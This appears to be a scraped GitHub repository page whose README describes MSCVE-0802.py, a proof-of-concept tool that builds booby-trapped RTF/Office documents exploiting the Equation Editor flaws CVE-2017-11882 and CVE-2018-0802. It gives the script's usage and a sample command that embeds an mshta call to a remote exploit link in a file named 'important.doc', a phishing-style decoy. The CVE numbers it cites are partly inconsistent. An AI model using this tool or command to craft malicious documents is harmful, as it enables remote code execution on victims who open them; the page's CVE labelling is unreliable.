Skip to content
Branch: master
Find file History
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
..
Failed to load latest commit information.
wall
Buffer Overflow Tutorial in Kali.md
LICENSE
MSCVE-0802.py
README.MD
commands.md
d4831515864319.pdf
runner.sh

README.MD

MSCVE-0802

CVE-2017-11882

MITRE CVE-2017-11882: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882

CVE-2018-0802

CVE-2018-0802: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802

Research: https://research.checkpoint.com/another-office-equation-rce-vulnerability/


Reference: https://www.cvedetails.com/cve/CVE-2019-0802/

Usage

usage: MSCVE-0802.py [-h] -c COMMAND -o OUTPUT [-i INPUT]

PoC for CVE-2010-0802 And CVE-2017-11882

optional arguments:
  -h, --help            show this help message and exit
  -c COMMAND, --command COMMAND
                        Command run in target system
  -o OUTPUT, --output OUTPUT
                        Output exploit rtf
  -i INPUT, --input INPUT
                        Input normal rtf.

Command

python MSCVE-0802.py -c "mshta _your_link_to_local_exploit" -o important.doc

investigation of the issue: https://github.com/nu11secur1ty/CVE/blob/master/MSCVE-0802/d4831515864319.pdf Analysis: https://unit42.paloaltonetworks.com/unit42-analysis-of-cve-2017-11882-exploit-in-the-wild/ https://github.com/nu11secur1ty/CVE/blob/master/MSCVE-0802/Buffer%20Overflow%20Tutorial%20in%20Kali.md


video from @nu11secur1ty: https://www.youtube.com/watch?v=QpkfDkbhXa4

You can’t perform that action at this time.